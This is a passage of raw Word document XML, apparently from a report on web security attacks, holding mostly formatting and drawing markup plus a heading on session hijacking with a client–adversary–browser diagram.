          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442CDAAD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CDF159" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0964A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8235C7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D55E32B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8CB3A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D994B68" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEEBEBA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17DFA1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EAF936" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc48948"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ATTACKS: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4567384D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7B7D8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76022798" wp14:editId="4BB5E6BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40471" name="Group 4047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80" name="Shape 495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1" name="Shape 495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82" name="Shape 495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3" name="Shape 495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84" name="Shape 495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471" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49585" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49586" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49587" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49588" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4958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1C617F29" wp14:editId="6357F899">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40472" name="Group 4047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590" name="Shape 495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1" name="Shape 495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92" name="Shape 495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3" name="Shape 495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594" name="Shape 495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472" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49595" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49596" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49597" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49598" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4959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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Session Hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B849318" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="634"/>
        <w:ind w:left="4534"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E8E1F8" wp14:editId="4131BF82">
            <wp:extent cx="2973923" cy="663011"/>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29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="2973923" cy="663011"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BA6FA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C8CC4F4" wp14:editId="2F6C9F9B">
                <wp:extent cx="5836799" cy="2919889"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40468" name="Group 40468"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5836799" cy="2919889"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5836799" cy="2919889"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1439" name="Shape 1439"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="844980" y="575551"/>
                            <a:ext cx="658236" cy="328177"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="658236" h="328177">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="658236" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="658236" y="328177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="328177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1440" name="Shape 1440"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="844980" y="575551"/>
                            <a:ext cx="658236" cy="328177"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="658236" h="328177">
                                <a:moveTo>
                                  <a:pt x="0" y="328177"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="658236" y="328177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="658236" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2894" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1441" name="Rectangle 1441"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1041465" y="697893"/>
                            <a:ext cx="347354" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="429E5AB1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>CLIENT</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1442" name="Shape 1442"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2153813" y="2215813"/>
                            <a:ext cx="668186" cy="675407"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="668186" h="675407">
                                <a:moveTo>
                                  <a:pt x="486017" y="574"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="524985" y="0"/>
                                  <a:pt x="562385" y="24619"/>
                                  <a:pt x="579017" y="66255"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="634632" y="99772"/>
                                  <a:pt x="668186" y="164919"/>
                                  <a:pt x="665748" y="234523"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="643456" y="280231"/>
                                  <a:pt x="615707" y="322385"/>
                                  <a:pt x="583430" y="359410"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="616403" y="391931"/>
                                  <a:pt x="635096" y="439943"/>
                                  <a:pt x="632774" y="486184"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="620235" y="527423"/>
                                  <a:pt x="586100" y="552048"/>
                                  <a:pt x="551152" y="545241"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="525028" y="591541"/>
                                  <a:pt x="480212" y="615635"/>
                                  <a:pt x="435279" y="607583"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="433537" y="607765"/>
                                  <a:pt x="431680" y="607765"/>
                                  <a:pt x="429938" y="607583"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="412522" y="605772"/>
                                  <a:pt x="399518" y="586674"/>
                                  <a:pt x="401028" y="564930"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="393481" y="595301"/>
                                  <a:pt x="377226" y="621204"/>
                                  <a:pt x="355515" y="637784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="306053" y="675407"/>
                                  <a:pt x="241499" y="656010"/>
                                  <a:pt x="211312" y="594459"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="202023" y="600129"/>
                                  <a:pt x="192038" y="603388"/>
                                  <a:pt x="181705" y="604040"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="139907" y="606683"/>
                                  <a:pt x="104379" y="566658"/>
                                  <a:pt x="102289" y="514641"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="55730" y="513206"/>
                                  <a:pt x="16719" y="475926"/>
                                  <a:pt x="8940" y="425622"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="367433"/>
                                  <a:pt x="35760" y="312312"/>
                                  <a:pt x="88821" y="302494"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="61304" y="260503"/>
                                  <a:pt x="57704" y="207188"/>
                                  <a:pt x="79416" y="165116"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="110880" y="104356"/>
                                  <a:pt x="184607" y="85775"/>
                                  <a:pt x="244053" y="123610"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="251600" y="112241"/>
                                  <a:pt x="261237" y="102516"/>
                                  <a:pt x="272499" y="95176"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="313600" y="68362"/>
                                  <a:pt x="365151" y="78921"/>
                                  <a:pt x="387676" y="118747"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="384425" y="72252"/>
                                  <a:pt x="408343" y="28582"/>
                                  <a:pt x="447238" y="9849"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="459864" y="3756"/>
                                  <a:pt x="473028" y="766"/>
                                  <a:pt x="486017" y="574"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1443" name="Shape 1443"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2153813" y="2201292"/>
                            <a:ext cx="668186" cy="689929"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="668186" h="689929">
                                <a:moveTo>
                                  <a:pt x="102289" y="529163"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="104379" y="581180"/>
                                  <a:pt x="139907" y="621204"/>
                                  <a:pt x="181705" y="618561"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="192038" y="617909"/>
                                  <a:pt x="202023" y="614650"/>
                                  <a:pt x="211312" y="608981"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="241499" y="670532"/>
                                  <a:pt x="306053" y="689929"/>
                                  <a:pt x="355515" y="652306"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="377226" y="635726"/>
                                  <a:pt x="393481" y="609822"/>
                                  <a:pt x="401028" y="579451"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399518" y="601196"/>
                                  <a:pt x="412522" y="620293"/>
                                  <a:pt x="429938" y="622105"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="431680" y="622287"/>
                                  <a:pt x="433537" y="622287"/>
                                  <a:pt x="435279" y="622105"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="480212" y="630156"/>
                                  <a:pt x="525028" y="606063"/>
                                  <a:pt x="551152" y="559762"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="586100" y="566570"/>
                                  <a:pt x="620235" y="541944"/>
                                  <a:pt x="632774" y="500705"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="635096" y="454465"/>
                                  <a:pt x="616403" y="406453"/>
                                  <a:pt x="583430" y="373931"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="615707" y="336906"/>
                                  <a:pt x="643456" y="294753"/>
                                  <a:pt x="665748" y="249044"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="668186" y="179440"/>
                                  <a:pt x="634632" y="114293"/>
                                  <a:pt x="579017" y="80776"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="556841" y="25262"/>
                                  <a:pt x="497743" y="0"/>
                                  <a:pt x="447238" y="24371"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408343" y="43103"/>
                                  <a:pt x="384425" y="86774"/>
                                  <a:pt x="387676" y="133269"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="365151" y="93442"/>
                                  <a:pt x="313600" y="82884"/>
                                  <a:pt x="272499" y="109697"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="261237" y="117037"/>
                                  <a:pt x="251600" y="126762"/>
                                  <a:pt x="244053" y="138131"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="184607" y="100296"/>
                                  <a:pt x="110880" y="118878"/>
                                  <a:pt x="79416" y="179637"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57704" y="221710"/>
                                  <a:pt x="61304" y="275024"/>
                                  <a:pt x="88821" y="317016"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35760" y="326834"/>
                                  <a:pt x="0" y="381955"/>
                                  <a:pt x="8940" y="440143"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16719" y="490448"/>
                                  <a:pt x="55730" y="527727"/>
                                  <a:pt x="102289" y="529163"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2894" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1444" name="Rectangle 1444"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2264693" y="2505413"/>
                            <a:ext cx="603501" cy="125862"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2BC313A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>ADVERSARY</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1445" name="Rectangle 1445"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3692441" y="286312"/>
                            <a:ext cx="777240" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="06B1F8B4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>WEB BROWSER</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1446" name="Shape 1446"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3732265" y="411451"/>
                            <a:ext cx="658202" cy="656330"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="658202" h="656330">
                                <a:moveTo>
                                  <a:pt x="329159" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="510864" y="0"/>
                                  <a:pt x="658202" y="146919"/>
                                  <a:pt x="658202" y="328107"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="658202" y="509411"/>
                                  <a:pt x="510864" y="656330"/>
                                  <a:pt x="329159" y="656330"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="147338" y="656330"/>
                                  <a:pt x="0" y="509411"/>
                                  <a:pt x="0" y="328107"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
